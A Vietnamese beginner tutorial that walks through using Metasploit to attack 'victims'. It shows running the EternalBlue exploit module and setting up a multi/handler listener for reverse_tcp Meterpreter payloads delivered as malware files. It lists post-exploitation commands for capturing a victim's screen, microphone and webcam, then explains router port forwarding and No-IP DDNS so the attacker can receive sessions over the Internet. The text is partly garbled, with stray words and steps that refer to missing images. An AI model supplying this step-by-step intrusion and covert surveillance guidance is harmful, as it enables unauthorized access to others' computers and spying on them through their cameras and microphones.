Metasploit Framework là một framework viết bằng Ruby sử dụng để tấn công và khai thác những lỗ hổng trên nhiều loại hệ thống khác nhau (Windows/Linux/Cisco/WordPress/….) Show Dẹp bỏ qua những khái niệm rắc rối và không cần thiết, hôm nay mình sẽ cùng các bạn tìm hiểu Metasploit Framework ở mức độ cực kì cơ bản A. Cài đặtHiện tại có 5 cách để cài đặt Metasploit
=> Tóm lại. Vì bạn là người mới học ở mức độ cực kì cơ bản. Thì các bạn xài cách 1 cho nhanh. Còn 4 cách sau thì bỏ qua, sau thích thì cài, không thì thôi B. Một số khái niệm rất chi là cơ bản (Học thuộc đi nhé)
B0: Trong lần khởi động đầu tiên. Gõ lệnh msfdb init để tạo database cho metasploit Ghi chú nho nhỏ: Sau này bạn cần update metasploit thì cứ apt-get update && apt-get upgrade -y nhé, không phải update thủ công đâu B1: Khởi động service database hỗ trợ cho metasploit: service postgresql start B2: Khởi động nó lên bằng lệnh msfconsole rồi chờ vài phút thôi D. Dùng Metasploit để khai thác lỗ hổngB1:
Tìm kiếm thông tin về moudle lỗ hổng. Mỗi lỗ hổng thường đi kèm mã của nó. Thí dụ tôi muốn khai thác lỗ hổng MS17_010 (hoặc là CVE-2017-0143) chẳng hạn. Có 2 cách sau để tìm ra Cách 1: Nhanh hơn. Google từ khóa mã lỗ hổng+metasploit moudle exploit (Hoặc how to exploit + mã lỗ hổng+ by metasploit) . Ưu tiên lựa chọn các kết quả từ trang rapid7.com nhé (Trang của nhà phát triển Metasploit) 2 kết quả đó cái thứ hai các bạn thấy có chữ Detection có nghĩa là dùng để quét xem Victim có bị lỗ hổng hay không. Còn cái thứ nhất là để khai thác. Khi truy cập vào trang đó thì các bạn có thể dễ dàng tìm được câu lệnh (use exploit/windows/smb/ms17_010_eternalblue) tại Module Options. Và còn nhiều thông tin khác về lỗ hổng Cách 2: Chậm hơn: dùng lệnh search+mã lỗ hổng để tìm Những module nào có chữ auxiliary là các module để kiểm tra victim còn exploit là các moudle để tấn công B2: Sau khi kiếm được moudle để tấn công rồi. Gõ lệnh use + tên moudle B3: Gõ lệnh Show Info để thu thập thông tin về Moudle. Có mấy điểm sau chúng ta cần lưu ý
B4: Sau khi hoàn thành tất cả những gì moudle yêu cầu các bạn gõ exploit để bắt đầu tấn công B5: Nếu thành công, nó sẽ có thông báo Meterpreter sessions x is
opened E. Dùng Metasploit để tấn công bằng file mã độcFile mã độc bạn có thể tạo bằng nhiều cách, xài msfvenom hoặc TheFatRat hoặc 1 tá công cụ khác trên Linux. Các bạn có thể dễ dàng tìm hiểu các cách tạo mã độc trong Playlist của tôi trên Youtube Bất cứ tool tạo mã độc nào mà có thể làm việc được với Metasploit thì các bạn đều phải khai báo ít nhất là 3 điều bắt buộc sau: LHOST; LPORT; PAYLOAD Rồi chúng ta sẽ thiết lập Metasploit để hứng kết nối từ Victim. B1: Khởi động Metasploit và lần lượt gõ các câu lệnh sau use exploit multi/handler set LHOST set LPORT set PAYLOAD exploit -j B2: Khi victim chạy file mã độc, chúng ta sẽ có phiên Meterpreter F. Hậu tấn côngSau khi đã có phiên Meterpreter, chúng ta hoàn toàn có thể gõ lệnh help để show ra những lệnh có thể xài để khai thác thông tin máy victim. tuy vậy, tôi cũng liệt kê ra một số lệnh rất chi là cơ bản screenshot: Chụp ảnh màn hình Victim record_mic: Ghi âm mic webcam_list: Hiển thị danh sách webcam webcam_snap: Chụp ảnh qua webcam victim webcam_stream: Stream trực tiếp từ máy victim vân vân và vân vân G. Cách mở port để tấn công qua mạng Internet (Sơ lược)B1: Mở trang cài đặt của Router ra. Nếu nhà bạn có nhiều router mắc nối tiếp, các bạn nên kết nối với con router đầu tiên B2: Tìm 1 phần tên là NAT hoặc Port Forwarding B3: Click Add để thêm 1 cấu hình mới. Chỗ này các bạn cần phải khai mấy thứ cơ bản sau. Tùy theo con router của bạn Server IP: Điền cái IP mạng LAN của Kali vào Port: Điền Port muốn mở, còn nếu có 2 mục LAN PORT và WAN PORT thì điền như nhau Đây là 1 số Video tôi đi mở Port cho anh em và quay lại. Còn các bác nào xài VNPT thì coi 2 hình kia là đủ NAT Port Router ZTE F600W https://www.youtube.com/watch?v=eHLr5gyuiOI NAT Port Router TPLINK ở tình huống phức tạp (Có 2 router và máy bác đó cắm vào Router thứ hai). Nếu bác nào mà Router TPLINK là router thứ nhất thì chỉ cần làm đoạn đầu thôi https://www.youtube.com/watch?v=4feMWc5snr8 Tester. Lưu ý cực kì quan trọng. Nếu xài máy ảo thì máy thật phải Off Firewall đi. Nếu không là không hứng được kết nối về use exploit multi/handler set LHOST IP Public tại trang ipcuatoi.com set LPORT Port đã mở set PAYLOAD windows/meterpreter/reverse_tcp exploit -j H. Cài đặt No-IP và đăng kí DDNSNếu bạn truy cập ipcuatoi.com một vài lần thì có thể dễ dàng thấy, địa chỉ IP Public của bạn bị thay đổi. Như vạy, chúng ta cần sử dụng 1 dịch vụ DDNS trung gian để nó dễ dàng phân giải ra IP mà chúng ta đang xài Ví dụ như sau – Nếu bạn tạo mã độc mà IP Hacker là 1.2.3.4 chẳng hạn, thì khi victim chạy thì nó sẽ tìm máy có IP 1.2.3.4 để trả phiên meterpreter về. Nhưng nếu IP Hacker bị đổi sang 3.4.5.6 thì hacker không thể nhận được Meterpreter session – Nếu bạn tạo mã độc mà IP Hacker là abc.ddns.net chẳng hạn, thì khi victim chạy thì nó sẽ kết nối tới cái DDNS abc.ddns.net và nó sẽ tự động phân giải ra IP thật của hacker. Trên máy hacker có cài tool để theo dõi sự thay đổi Ip để đảm bảo DDNS luôn khớp với IP Public hiện tại Hiện tại có 2 dịch vụ cung cấp DDNS FREE là No-IP và DynDNS. Trong bài này mình sẽ chỉ các bạn dùng No-IP 1. Đăng kí một tài khoản và tạo 1 DDNS mới Lưu ý: Chỗ hostname, nên chọn đuôi là ddns.net B2: Check Mail và Confrim Account: B4: Thực hiện tuần tự các lệnh sau tar -xvf noip-duc-linux.tar.gz cd noip-2.1.9-1/ chmod a+x Makefile ./Makefile B5: Nhập email bạn đăng kí No-IP bấm Enter B6: Nhập mật khẩu rồi bấm Enter 2 lần B7: Để khởi chạy No-IP các bạn gõ noip2 rồi Enter Giờ đây là bài test tấn công qua mạng Internet (Thử nghiệm trên Server của Admin) Hits: 15866 |